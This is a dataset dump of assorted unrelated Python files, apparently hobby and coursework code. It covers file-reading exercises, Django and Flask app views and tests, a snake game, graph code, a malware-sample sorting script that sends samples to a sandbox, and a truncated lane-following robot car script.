text stringlengths 8 6.05M |
|---|
### Chapter 7: Python 101 :Jimmy Moore ###
# Ex. 7.1
file = raw_input ('Enter a file name: ')
try:
fhand = open(file)
except:
print 'Cannot open file : ', file
exit()
for line in fhand:
line = line.rstrip()
print line.upper()
# Ex. 7.2
file = raw_input ('Enter a file name: ')
try:
fhand = open(file)
except:
print 'Cannot open file : ', file
exit()
count = 0
vspam = 0
for line in fhand:
line = line.rstrip()
if line.find('X-DSPAM-Confidence:') == -1:
continue
value = line[line.find(':')+1:]
value = value.strip()
vspam = vspam + float(value)
count = count + 1
avg = vspam/count
print 'The average spam confidence from the file', file, 'is: ', avg
# Ex. 7.3
file = raw_input ('Enter a file name: ')
if file == 'na na boo boo':
print 'NA NA BOO BOO TO YOU - You have been punk\'d!'
exit()
try:
fhand = open(file)
except:
print 'File cannot be opened: ', file
exit()
count = 0
for line in fhand:
if line.startswith('Subject:'):
count = count + 1
print 'There were', count, 'subject lines in', file |
import math
grades = [100, 100, 90, 40, 80, 100, 85, 70, 90, 65, 90, 85, 50.5]
def print_grades(grades):
for grade in grades:
print grade
def grades_sum(grades):
total = 0
for grade in grades:
total += grade
return total
def grades_average(grades):
sum_of_grades = grades_sum(grades)
average = sum_of_grades / len(grades)
return average
def grades_variance(grades, average):
variance = 0
for g in grades:
temp = average - g
temp = temp ** 2
variance = variance + temp
return variance / len(grades)
print grades_variance(grades, grades_average(grades))
def grades_std_deviation(variance):
return math.sqrt(variance)
print_grades(grades)
print grades_sum(grades)
print grades_average(grades)
print grades_variance(grades, grades_average(grades))
print grades_std_deviation(grades_variance(grades, grades_average(grades)))
|
# -*- coding: utf-8 -*-
import unittest
from django.test.testcases import TestCase, override_settings
from mock import patch, Mock, MagicMock, call
from stretch import stretch_app
from stretch.tests.base import get_connection
from example.models import Foo
from example.stretch_indices import FooIndex
def setUpModule():
with patch('elasticsearch_dsl.connections.connections.get_connection', get_connection):
stretch_app.reset()
stretch_app.connect()
def tearDownModule():
stretch_app.reset()
stretch_app.connect()
@patch('elasticsearch_dsl.connections.connections.get_connection', get_connection)
class StretchIndexTestCase(TestCase):
"""
Test the Method and Properties of StretchIndex
"""
def setUp(self):
stretch_app.deregister_signals()
def test_auto_index_name(self):
"""
Make sure we are generating correct index and document name from Model
"""
index = FooIndex()
self.assertEqual(index._get_index_name(), 'foos')
self.assertEqual(index._get_doc_type_name(), 'foo')
def test_dsl_doc_class(self):
"""
Make sure we are generating the Elasticsearch DSL Document Correctly
"""
index = FooIndex()
self.assertEquals(index.dsl._doc_type.index, 'foos')
self.assertEquals(index.dsl._doc_type.name, 'foo')
EXPECTED_MAPPING = {
'foo': {
'properties': {
'autocomplete_name': {
'analyzer': 'autocomplete_analyzer',
'search_analyzer': 'standard',
'type': 'string'
},
'name': {
'analyzer': 'standard',
'type': 'string'
},
'bar': {
'type': 'string'
}
}
}
}
self.assertDictEqual(index.dsl._doc_type.mapping.to_dict(), EXPECTED_MAPPING)
def test_custom_source(self):
"""
Test index method as field source
"""
index = FooIndex()
foo = Foo(name='my foo', content='foo content', decimal=2.0)
foo.save()
doc = index._populate_doc(foo)
self.assertEqual(doc.bar, 'custom value')
def test_populate_doc(self):
index = FooIndex()
foo = Foo(name='my foo', content='foo content', decimal=2.0)
foo.save()
doc = index._populate_doc(foo)
self.assertEqual(doc._id, foo.pk)
self.assertEqual(doc.name, foo.name)
def test_update_doc(self):
index = FooIndex()
foo = Foo(name='my foo', content='foo content', decimal=2.0)
foo.save()
index.update_doc(foo)
self.assertTrue(stretch_app.connection.index.called)
def test_remove_doc(self):
index = FooIndex()
foo = Foo(name='my foo', content='content', decimal=2.0)
foo.save()
index.update_doc(foo)
index.remove_doc(foo.pk)
self.assertTrue(stretch_app.connection.delete.called)
@patch('example.stretch_indices.FooIndex._populate_doc')
@patch('stretch.indices.logger')
def test_update_doc_log_exception(self, mock_logger, mock_populate):
def raise_exc(*args, **kwargs):
raise Exception('Test Exception')
mock_populate.return_value.save = raise_exc
index = FooIndex()
foo = Foo(name='my foo', content='foo content', decimal=2.0)
foo.save()
index.update_doc(foo)
mock_logger.exception.assert_called_once()
@patch('example.stretch_indices.FooIndex._populate_doc')
@patch('stretch.indices.logger')
def test_update_doc_raise_exception(self, mock_logger, mock_populate):
def raise_exc(*args, **kwargs):
raise Exception('Test Exception')
mock_populate.return_value.save = raise_exc
index = FooIndex()
foo = Foo(name='my foo', content='foo content', decimal=2.0)
foo.save()
stretch_app.settings['RAISE_EXCEPTIONS'] = True
with self.assertRaises(Exception):
index.update_doc(foo)
def test_update_docs(self):
stretch_app.connection.index.reset_mock()
bulk_mock = MagicMock()
with patch('stretch.indices.parallel_bulk', bulk_mock):
index = FooIndex()
foo = Foo(name='my foo', content='content', decimal=2.0)
foo.save()
other_foo = Foo(name='other foo', content='content', decimal=2.0)
other_foo.save()
index.update_docs()
self.assertTrue(bulk_mock.called)
def test_delete_index(self):
index = FooIndex()
index.delete_index()
stretch_app.connection.indices.delete.assert_called_with(index=index._get_index_name())
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.http import HttpResponse
from adafruit_motorkit import MotorKit
from adafruit_motor import stepper
import time
import subprocess
RESPONSE_STRING = "Welcome back!"
RUN_CMD = "sudo python3 open.py"
# Opens Door
def open(self):
# Initializes HTTP response objhect
httpResponse = HttpResponse(RESPONSE_STRING)
httpResponse['ExitStatus'] = 1
# Calls python script to run the motors
subprocess.call(RUN_CMD, shell=True)
# Returns HTTP response object
httpResponse['ExitStatus'] = 0 # 0-Successful, 1-Unsuccessful
httpResponse['DoorStatus'] = 0 # 0-Closed, 1-Operating
httpResponse['RoommateStatus'] = 0 # 0-In, 1-Away, 2-DoNotDisturb, 3-Sleeping
return httpResponse
|
from django.shortcuts import render, HttpResponse
from web_app.models import *
from web_app.serializers import *
from rest_framework.views import APIView
from django.http import JsonResponse
# Create your views here.
def index(request):
return HttpResponse('你好')
# http://127.0.0.1:8000/news/?id=1
def news_content(request):
id_num = request.GET.get('id')
context = {}
try:
context['News'] = News.objects.get(id=id_num)
context['title'] = context['News'].title
except News.DoesNotExist:
context['News'] = '404'
context['title'] = '404'
return render(request, 'web_app/article.html', context)
return render(request, 'web_app/article.html', context)
# http://127.0.0.1:8000/get_news/?id=1
class GetNews(APIView):
def get(self, request):
# 获取url参数
id_num = request.GET.get('id')
serializer = NewsSerializer(News.objects.all(), many=True)
# 返回信息
msg = {
'success': True,
'data': serializer.data
}
# 防止中文乱码
return JsonResponse(msg, json_dumps_params={'ensure_ascii': False}) |
__author__ = 'Bill'
import graphlab as gl
import math
## Load training data
train = gl.load_sframe("/Users/Bill/Dropbox/cs151/ctr/full_train_data")
train.remove_column("hour")
train.remove_column("id")
train["click"] = train["click"].astype(int)
subset = train[1:100]
print train.groupby("click", {'count': gl.aggregate.COUNT()})
clicked = train.filter_by([1], "click")
no_click = train.filter_by([0], "click")
no_skew = clicked.append(no_click.sample(0.2))
print no_skew.groupby("click", {'count': gl.aggregate.COUNT()})
## Train model
svm_model = gl.svm_classifier.create(subset, target="click")
full_boosted_model = gl.load_model("/Users/Bill/Dropbox/cs151/ctr/full_boosted_model")
full_logistic_model = gl.load_model("/Users/Bill/Dropbox/cs151/ctr/full_logistic_model")
## Testing
test = gl.load_sframe("/Users/Bill/Dropbox/cs151/ctr/full_test_data")
results = gl.SFrame()
results["id"] = test["id"]
test.remove_column("hour")
test.remove_column("id")
ttest = test[1:100]
## Predict
svm_pred = svm_model.predict(ttest, output_type="margin").apply(lambda x: 1.0 / (1.0 + math.exp(-x)))
boosted_pred = full_boosted_model.predict(ttest, output_type="probability")
logistic_pred = full_logistic_model.predict(ttest, output_type="probability")
## Write results
results["click"] = boosted_pred * 0.6 + logistic_pred * 0.2 + svm_pred * 0.2
print results
#results.save("/Users/Bill/Desktop/joinedResults.csv", format="csv")
|
#criar um arquivo e armazenar um registro
nome = input("Digite o nome: ")
idade = input("Digite a idade: ")
cpf = input("Digite o CPF: ")
registro = '\n' + nome + ';' + idade + ';' + cpf + ';'
with open('registro.txt','a+') as f:
f.write(registro)
exit()
cpf = input('Digite o cpf: ')
with open('arquivo_pessoa.json') as f:
conteudo = f.readlines()
# lista ['111.222.333-45;guilherme;30;',
# 111.222.333-46;luciana;28;]
for registro in conteudo:
#'111.222.333-45;guilherme;30;'
if cpf in registro:
saida = registro.split(';')
print('CPF:', saida[0])
print('Nome:', saida[1])
print('Idade:', saida[2])
print(conteudo)
exit()
#criar um arquivo e armazenar um registro
nome = input("Digite o nome: ")
idade = input("Digite a idade: ")
cpf = input("Digite o CPF: ")
|
from turtle import Turtle,Screen
import time
UP = 90
DOWN = 270
LEFT = 180
RIGHT = 0
class Snake:
def __init__(self):
self.screen = Screen()
self.snake = [Turtle(shape="circle") for _ in range(3)]
self.screen.bgcolor("black")
self.screen.setup(width=600,height=600)
self.screen.title("Snake game")
self.header = self.snake[0]
for i in range(len(self.snake)):
self.snake[i].color("green")
self.snake[i].up()
self.snake[i].setpos(x=i*-20,y=0.0)
def move(self):
self.screen.tracer(0)
# while True:
self.screen.update()
time.sleep(0.1)
for i in range(len(self.snake)-1,0,-1):
self.snake[i].goto(self.snake[i-1].xcor(),self.snake[i-1].ycor())
self.snake[0].fd(20)
def left(self):
self.screen.update()
time.sleep(0.01)
for i in range(len(self.snake)-1,0,-1):
self.snake[i].goto(self.snake[i-1].xcor(),self.snake[i-1].ycor())
if self.snake[0].heading()!=RIGHT:
self.snake[0].seth(LEFT)
self.snake[0].fd(20)
def right(self):
self.screen.update()
time.sleep(0.01)
for i in range(len(self.snake)-1,0,-1):
self.snake[i].goto(self.snake[i-1].xcor(),self.snake[i-1].ycor())
if self.snake[0].heading()!=LEFT:
self.snake[0].seth(RIGHT)
self.snake[0].fd(20)
def down(self):
self.screen.update()
time.sleep(0.01)
for i in range(len(self.snake)-1,0,-1):
self.snake[i].goto(self.snake[i-1].xcor(),self.snake[i-1].ycor())
if self.snake[0].heading()!=UP:
self.snake[0].seth(DOWN)
self.snake[0].fd(20)
def up(self):
self.screen.update()
time.sleep(0.01)
for i in range(len(self.snake)-1,0,-1):
self.snake[i].goto(self.snake[i-1].xcor(),self.snake[i-1].ycor())
if self.snake[0].heading()!=DOWN:
self.snake[0].seth(UP)
self.snake[0].fd(20)
|
#!python3
"""
Implementation of a directed Graph Class
"""
from graphs.vertex import Vertex
class Digraph:
def __init__(self):
"""
Initializes a graph object with an empty dictionary.
self.edge_list -> List of the edges
self.num_verticies -> Number of verticies
self.num_edges -> Number of edges
"""
# These represents the edges
self.vert_dict = {}
self.num_verticies = 0
self.num_edges = 0
def add_vertex(self, key):
"""
Add a new vertex object to the graph with
the given key and return the vertex.
"""
self.num_verticies += 1
new_vertex = Vertex(key)
self.vert_dict[key] = new_vertex
return new_vertex
def add_edge(self, f, t, cost=0):
"""add an edge from vertex f to vertex t with a cost"""
if f not in self.vert_dict:
self.add_vertex(f)
if t not in self.vert_dict:
self.add_vertex(t)
self.vert_dict[f].add_neighbor(self.vert_dict[t], cost)
self.vert_dict[t].add_neighbor(self.vert_dict[f], cost)
self.num_edges += 1
def get_vertices(self):
"""return all the vertices in the graph"""
return self.vert_dict.keys()
def get_edges(self, vertex):
dict_edges = self.vert_dict[vertex].neighbors
return dict_edges
def _dfs_recursive(self, from_vert, to_vert, visited):
"""
Resources: https://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/
"""
# Error handling to make sure that both the vertices are in the graph
if from_vert not in self.vert_dict or to_vert not in self.vert_dict:
raise KeyError("Either or both of the keys are not in the graph!")
if visited is None:
visited = set()
curr_vert = self.vert_dict[from_vert]
visited.add(from_vert)
for neighbor in curr_vert.get_neighbors():
if neighbor.id not in visited:
# print("Visited Before:", visited, neighbor.id)
self._dfs_recursive(neighbor.id, to_vert, visited)
# print("Visited After:", visited)
return visited
def _dfs_recursive_find_path(self, from_vert: str, to_vert: str):
"""
Find a path between two vertices using DFS.
Wraps the dfs algorithm to modify output
Args:
* from_vert - The from vertex to search from
* to_vert - The to vertex to search to.
Returns:
The path we're between two vertices if they're found, None otherwise.
"""
path = self._dfs_recursive(from_vert, to_vert, set())
return path |
import selenium.webdriver as webdriver
from constants import driver_path
def has_digits(input_str):
return any(char.isdigit() for char in input_str)
def start_headless_driver():
options = webdriver.ChromeOptions()
options.add_argument('headless')
return webdriver.Chrome(executable_path=driver_path, chrome_options=options)
|
import base64
#encoding=utf-8
data="我爱你中国"
data=data.encode("utf-8")
data_b64=base64.b64encode(data)
data2=str(data_b64,'utf-8')
# print("data:",data)
# print("type:",type(data))
# print("data_b64",data_b64)
# print("tpye2:",type(data_b64))
# print("data2:",data2)
# print("tpye3:",type(data2))
#解密 data2
data2=data2.encode('utf-8')
data2_decode=base64.b64decode(data2)
#data3=str(data2_decode,'utf-8')
data3=data2_decode.decode('utf-8')
print(data3) |
from datetime import date
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from rest_framework import serializers
from .models import Profile,TermsConditionsText,TermsConditions
from hrr.fitbit_aa import belowaerobic_aerobic_anaerobic
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id','username','email','first_name','last_name')
class UserProfileSerializer(serializers.ModelSerializer):
username = serializers.CharField(source='user.username')
email = serializers.EmailField(source='user.email')
password = serializers.CharField(source='user.password',write_only=True)
first_name = serializers.CharField(source='user.first_name')
last_name = serializers.CharField(source='user.last_name')
def validate_username(self,username):
'''
Make a case insensitive check to determine uniqueness of username
'''
UserModel = get_user_model()
case_insensitive_username_field = "{}__iexact".format(UserModel.USERNAME_FIELD)
if (username and UserModel._default_manager.filter(
**{case_insensitive_username_field:username}).exists()):
raise serializers.ValidationError("Username already exist")
return username
def validate_email(self,email):
'''
Make a case insensitive check to determine uniqueness of email
'''
UserModel = get_user_model()
case_insensitive_email_field = "{}__iexact".format(UserModel.EMAIL_FIELD)
if (email and UserModel._default_manager.filter(
**{case_insensitive_email_field:email}).exists()):
raise serializers.ValidationError("Email already exist")
return email
def get_user_age(self,obj):
today = date.today()
dob = obj.date_of_birth
if dob:
return (today.year - dob.year
- ((today.month, today.day) < (dob.month, dob.day)))
else:
return obj.user_age
def get_user_aa_ranges(self, obj):
age = self.get_user_age(obj)
aa_ranges = belowaerobic_aerobic_anaerobic(obj.user.username,age)
return {
"aerobic_range_start":aa_ranges[1],
"anaerobic_range_start":aa_ranges[2]
}
class Meta:
model = Profile
fields = ('id','username','email','password','first_name','last_name',
'gender','height','weight','date_of_birth','user_age',
'created_at','updated_at','terms_conditions')
def create(self,validated_data):
user_data = validated_data.pop('user')
user = User.objects.create_user(**user_data)
profile = Profile.objects.create(user=user,**validated_data)
if validated_data['terms_conditions']:
terms = TermsConditionsText.objects.get(version='1.0')
TermsConditions.objects.create(user=user,
terms_conditions_version=terms)
return profile
def update(self, instance, validated_data):
user = instance.user
user.email = validated_data.get('email',user.email)
user.save()
instance.first_name = validated_data.get('first_name', user.first_name)
instance.last_name = validated_data.get('last_name', user.first_name)
instance.gender = validated_data.get('gender',instance.gender)
instance.height = validated_data.get('height', instance.height)
instance.weight = validated_data.get('weight', instance.weight)
instance.date_of_birth = validated_data.get('date_of_birth',instance.date_of_birth)
instance.user_age = validated_data.get('user_age', instance.user_age)
instance.save()
return instance
def linktotc(self,validated_data):
user_data = validated_data.pop('user')
user = User.objects.create_user(**user_data)
termsconditions = TermsConditions.objects.create(user=user,**validated_data)
return termsconditions
def to_representation(self,instance):
serialized_data = super().to_representation(instance)
serialized_data['user_age'] = self.get_user_age(instance)
serialized_data['aa_ranges'] = self.get_user_aa_ranges(instance)
return serialized_data |
from appium_auto.three.page.base_page import BasePage
from py_test.pytest_shuju_qudong.page.market import Market
class Search(BasePage):
def search(self, value):
self._param["value"]=value
self.steps("../page/search.yaml")
return Market(self._driver) |
from helper import helper
from score import score
import random as rm
import math as m
import sys
import copy
import time
import matplotlib.pyplot as plt
import numpy as np
''' Survival of the Fittest algorithm'''
def populationBased(populationSize, mel, mir):
'''
A population based optimization algorithm based on genetic algorithms,
which are metaheuristics inspired by the process of natural selection.
The optimization consists of mutating the genome sequence of the
Drosophila Melanogaster into the Drosophila Miranda.
The algorithm mutates N(populationSize) random gene rows from the mel,
then calculate the score per gene row and chooses, based on that score,
the best gene row. This continues witch each new mutation, until the best
gene found is the solution (mir).
Arguments:
------------------------------------------------------------
populationSize: Integer value that signifies the magnitude of the population
size.
------------------------------------------------------------
mel: The gene row list where to start from.
------------------------------------------------------------
mir: The gene row list where to finish.
------------------------------------------------------------
Returns:
------------------------------------------------------------
Generation: List containing all best found generows and their scores
that brought to the solution.
------------------------------------------------------------
Count: Integer value that signifies the amount of mutations needed.
------------------------------------------------------------
'''
with open("resultaten/population.txt", "w") as f:
print("SURVIVAL OF THE FITTEST ALGORITHM", file=f)
print("---------------------------------", file=f)
print("---------------------------------")
print("SURVIVAL OF THE FITTEST ALGORITHM")
print("---------------------------------")
print("Start of with Mel:", mel)
print(" ".join(("Start off with Mel:", str(mel))), file=f)
print("Run algorithm so that Mel turns in to Mir:", mir)
print(" ".join(("Run algorithm so that Mel turns in to Mir:", str(mir)))
, file=f)
print("Finding best mutated Mel per iteration out of the population"
+ "size:", populationSize)
print(" ".join(("Finding best mutated Mel per iteration out of the"
+ "population size:", str(populationSize))), file=f)
generation = [(0,())]
count = 0
bestMel = mel
lastGen = mel
while lastGen != mir:
# mutate from best mel X amount of new children
swapList = helper.mutate(bestMel, populationSize, [])
# make a set of the swapList so it deletes doubles
swapList = set(swapList)
# calculate and append score to new children
scoreList = score.scoreNeighboursList(swapList, [], mir)
# manipulate data so that score and children are
# connected in a tuple
tupleSwap = helper.makeTuple([], scoreList, swapList)
# order tuple from low score to high score
orderedTuple = sorted(tupleSwap)
# define new and previous best score
newBestScore = orderedTuple[-1][0]
prevBestScore = generation[-1][0]
# take the last item in ordered list tuple to get te best
# score and it's gene row
best = (orderedTuple[-1][0], orderedTuple[-1][1])
# if new generated gene row is better then previous append
# new as new best
if prevBestScore <= newBestScore:
generation.append(best)
# continue with new gene row to mutate
bestMel = list(orderedTuple[-1][1])
lastGen = list(generation[-1][1])
print("Best Found (score, [genrow]):", best,
", Mutation number:", count+1)
print(" ".join(("Best Found (score, [genrow], mutationPoints):"
, str(best), ", Mutation number:", str(count+1))), file=f)
count += 1
# check if reversed is true, if yes swap to ascending order
reversed = helper.isReversed(lastGen)
if reversed == True:
swapMel(24,0,lastGen)
print(" ".join(("Winning Generation[(score, genrow), (nextBestScore,"
+ "nextBestGenRow), ...]:", str(generation))), file=f)
print(" ".join(('Amount of mutations needed:', str(count))), file=f)
print("-----------------------------")
print("-----------------------------", file=f)
print("RESULT")
print("-----------------------------")
return generation, count
|
#!/usr/bin/python3
'''
Creation, Updating, Deleting functions from Flask application
'''
import models
from models import storage
from app import application
from flask import render_template, flash, redirect, url_for, request, session
from flask import jsonify, abort
from app.forms import CreateTrip
from flask_login import current_user, login_required
# Getter Functions for Dynamic Loading
@application.route('/trip_roster', methods=["GET", "POST"])
@login_required
def trip_roster():
'''
Populates the modal footer with all users on a specific trip
'''
users = []
if request.method == "POST":
content = request.get_json()
print(content)
for user in content['users']:
user_obj = storage.get_user(user)
if user_obj:
users.append(user_obj.to_dict_mongoid())
else:
abort(404)
if users:
return jsonify(users)
else:
abort(404)
@application.route('/get_trip/<trip_id>', methods=["GET"])
@login_required
def get_trip(trip_id):
'''
Grabs a specific trip from the database based on the trip ID to be
used for dynamic AJAX updates on modals
'''
trip = storage.get("Trip", trip_id)
if trip:
return jsonify(trip.to_dict_mongoid())
else:
abort(404)
@application.route('/get_sender/<notification_id>', methods=["GET"])
@login_required
def get_sender(notification_id):
'''
Grabs the notification sender user from the database in order
to dynamically update the message modal
'''
note = storage.get("Notification", notification_id)
if note:
user = storage.get_user(note.sender)
if user:
return jsonify(user.to_dict_mongoid())
else:
abort(404)
@application.route('/users/<username>', methods=["GET"])
@login_required
def get_user_profile(username):
if username == current_user.username:
return redirect(url_for('display_profile'))
hosted_trips = []
active_trips = []
user = storage.get_user(username)
if user:
for trip in user.hosted_trips:
hosted_trips.append(storage.get("Trip", trip))
for trip in user.active_trips:
active_trips.append(storage.get("Trip", trip))
session['url'] = url_for('get_user_profile', username=username)
tripform = CreateTrip(request.form)
return render_template('user_profile.html', user=user,
hosted_trips=hosted_trips,
active_trips=active_trips,
tripform=tripform)
else:
abort(404)
#######################################################################
# Object Creation Functions
@application.route('/createtrip', methods=["GET", "POST"])
@login_required
def create_trip():
'''
Creates a new trip object in the database
'''
tripform = CreateTrip(request.form)
if request.method == "POST" and tripform.validate_on_submit():
trip_dict = {"city": tripform.city.data,
"country": tripform.country.data,
"date_range": tripform.dates.data,
"description": tripform.description.data,
"users": [current_user.username],
"host": current_user.username,
"host_pic": current_user.profile_pic,
"host_firstname": current_user.first_name,
"host_lastname": current_user.last_name}
new_trip = models.Trip(**trip_dict)
if current_user.hosted_trips:
current_user.hosted_trips.append(new_trip.id)
else:
setattr(current_user, "hosted_trips", [new_trip.id])
storage.save(current_user)
storage.save(new_trip)
return redirect(session['url'])
else:
return "", 204
@application.route('/send_notification/<trip_id>', methods=["POST"])
@login_required
def send_notification(trip_id):
'''
Sends a notification to a trip host and saves the notification
to the user's sent notifications and the host's received notifications
'''
note = models.Notification()
trip = storage.get("Trip", trip_id)
if trip:
trip_host = storage.get_user(trip.host)
if trip_host:
# Check if user is trying to join his/her own trip
if trip_host.username == current_user.username:
return jsonify({"response": "Can't request own trip..."})
# Check if user has already a sent a request for this trip
for notification in current_user.notifications['sent']:
sent = storage.get("Notification", notification)
if sent.trip_id == trip_id:
print("Already sent")
return jsonify({"response": "Request already sent..."})
# Check if user has already joined the selected trip
if current_user.username in trip.users:
return jsonify({"response": "Already part of this trip"})
# Send a request to the host that current user wants to join
note.sender = current_user.username
note.recipient = trip.host
note.trip_id = trip_id
note.purpose = "Join"
note.trip_info = {"country": trip.country, "city": trip.city, "date_range": trip.date_range}
current_user.notifications['sent'].append(note.id)
trip_host.notifications['received'].append(note.id)
storage.save(note)
storage.save(current_user)
storage.save(trip_host)
print("Success")
return jsonify({"response": "Successfully Sent!"})
else:
abort(404)
else:
abort(404)
@application.route('/friend_request/<username>', methods=["GET"])
@login_required
def send_friend_request(username):
note = models.Notification()
note.sender = current_user.username
note.recipient = username
note.purpose = "Friend"
recipient = storage.get_user(username)
if recipient:
for note in current_user.notifications['sent']:
if note.purpose == "Friend" and note.sender == current_user.username \
and note.recipient == recipient.username:
return jsonify({"response": "Friend request pending.."})
if recipient.username in current_user.friends:
return jsonify({"response": "Already friends"})
current_user.notifications['sent'].append(note.id)
recipient.notifications['received'].append(note.id)
storage.save(note)
storage.save(recipient)
storage.save(current_user)
else:
abort(404)
#######################################################################
# Object Deletion Functions
@application.route('/delete_trip/<tripid>', methods=["DELETE"])
@login_required
def delete_trip(tripid):
trip = storage.get("Trip", tripid)
if trip:
for user in trip.users:
person = storage.get_user(user)
if person.username == trip.host:
person.hosted_trips.remove(tripid)
else:
person.active_trips.remove(tripid)
storage.save(person)
storage.delete(trip)
return jsonify(dict(redirect=url_for('display_profile')))
else:
abort(404)
#######################################################################
# Notification Accept/Reject Functions
@application.route('/notification/<noteid>/accepted_request/<tripid>')
@login_required
def accept_request(noteid, tripid):
'''
The sequence of events that occur after the host of a trip
accepts another user's request to join their trip
'''
trip = storage.get("Trip", tripid)
if trip:
note = storage.get("Notification", noteid)
if note:
user = storage.get_user(note.sender)
host = storage.get_user(note.recipient)
if user and host:
trip.users.append(user.username)
user.active_trips.append(trip.id)
user.notifications['approved'].append(note.id)
user.notifications['sent'].remove(note.id)
host.notifications['received'].remove(note.id)
storage.save(trip)
storage.save(user)
storage.save(host)
return jsonify(dict(redirect=url_for('display_notifications')))
else:
abort(404)
else:
abort(404)
else:
abort(404)
@application.route('/notification/<noteid>/rejected_request')
@login_required
def reject_request(noteid):
'''
The sequence of events that occur after the host of a trip
rejects another user's request to join their trip
'''
note = storage.get("Notification", noteid)
if note:
user = storage.get_user(note.sender)
host = storage.get_user(note.recipient)
if user and host:
print(user.notifications)
print(host.notifications)
user.notifications['rejected'].append(note.id)
user.notifications['sent'].remove(note.id)
host.notifications['received'].remove(note.id)
print(user.notifications)
print(host.notifications)
storage.save(user)
storage.save(host)
return jsonify(dict(redirect=url_for('display_notifications')))
else:
abort(404)
else:
abort(404)
|
#!/usr/bin/python3
"""
Copyright (c) 2015, Joshua Saxe
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name 'Joshua Saxe' nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL JOSHUA SAXE BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from cuckooanalysis import dispatchcuckoo
from auxiliary import pecheck, getdatabase
from extractattributes import extractstrings
def handlenonexe(documentsamples):
"""
Store `strings` attributes of non-exe malware samples in shelve db
Args:
documentsamples: absolute paths of all non-exe malware samples
Raises:
Returns:
None
"""
successcounter = 0
# Get shelve database object
db = getdatabase()
for path in documentsamples:
# Get malware sample's printable strings and store in dict
db[path] = extractstrings(path)
# Write data back to db
db.sync()
successcounter = successcounter + 1
#print ("[*] Extracted {0} attributes from {1}".format(len(attributes), path))
print("Extracted attributes for " + str(successcounter) + \
" document type malware samples")
def handleexe(exesamples):
"""
Dispatch exe samples to cuckoo for analysis and write successfull task ids
to `taskids` file and error ids to `errorids` in the current directory
Args:
absolute paths of all exe malware samples
Raises:
Returns:
None
"""
# Dispatch exe samples for cuckoo analysis
taskids, errorids = dispatchcuckoo(exesamples)
if taskids:
print("[*] Received task ids! Writing to `taskids`")
with open('taskids', 'w') as f:
f.write(','.join(map(str, taskids)))
if errorids:
print("[*] Received error ids! Writing to `errorids`")
with open('errorids', 'w') as f:
f.write(','.join(map(str, errorids)))
def store(malwarepaths):
"""
Stores non-exe samples' `strings` into shelve db and dispatches exe samples
to cuckoo for analysis
Args:
malwarepaths: absolute paths of all malware samples
Raises:
Returns:
None
"""
exesamples = []
documentsamples = []
# Separate EXE and non-EXE malware samples
for sample in malwarepaths:
if pecheck(sample):
exesamples.append(sample)
else:
documentsamples.append(sample)
# Store `strings` of non-exe samples in shelve db
if documentsamples:
handlenonexe(documentsamples)
print("[+] Stored `strings` attributes in shelve DB")
# Dispatch exe samples to cuckoo
if exesamples:
handleexe(exesamples)
print("[+] Dispatched exe samples to cuckoo")
|
MAX_RANK = 15000
PER_PAGE = 25
TYPES = dict(
designers='designer',
publishers='publisher',
artists='artist',
mechanics='mechanic',
)
WAR_RANK = 500 |
#! /usr/bin/python
# coding=utf-8
import time
import select
import sys
import os
import RPi.GPIO as GPIO
import numpy as np
import picamera
import picamera.array
import matplotlib.pyplot as plt
import time
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import math
import os
from car import Car
from infrad import Infrad
from lane_lines import *
krate_sum=[ 0 for i in range(10) ]
def forward(car):
car.set_speed(60, 60)
time.sleep(0.1)
car.set_speed(0, 0)
def find_left(car):
car.set_speed(-100, 100)
time.sleep(0.15)
car.set_speed(50, 50)
def find_right(car):
car.set_speed(100, -100)
time.sleep(0.15)
car.set_speed(50, 50)
def rush_left(car):
car.set_speed(-200, 200)
time.sleep(0.1)
car.set_speed(50, 50)
def rush_right(car):
car.set_speed(-200, 200)
time.sleep(0.2)
car.set_speed(50, 50)
def set_slow(car):
car.set_speed(-80, -80)
time.sleep(0.25)
car.set_speed(-160, 160)
time.sleep(0.2)
car.set_speed(50, 50)
def krate(line):
# compute the sign of the slop of the line
rate = (line[0] - line[2]) / (line[1] - line[3])
return round(rate, 4)
def kratesum(lines):
global krate_sum
rsum = krate(lines[0]) + krate(lines[1])
del krate_sum[0]
krate_sum.append(rsum)
result=np.fft.fft(krate_sum)
return(result)
def kratesum(lines):
return krate(lines[0]) + krate(lines[1])
def stage_control(lines, car):
if lines!=None and len(lines)==2:
k = kratesum(lines)
else:
return -1, -1
if abs(k) <= 4:
forward(car)
v1, v2 = 60, 60
elif k < -4:
find_right(car)
v1, v2 = 60, -60
elif k > 4:
find_left(car)
v1, v2 = -60, 60
# car.set_speed(v1, v2)
return v1, v2
def stage_detect(image_in):
image = filter_colors(image_in)
gray = grayscale(image)
blur_gray = gaussian_blur(gray, kernel_size)
edges = canny(blur_gray, low_threshold, high_threshold)
imshape = image.shape
vertices = np.array([[\
((imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0]),\
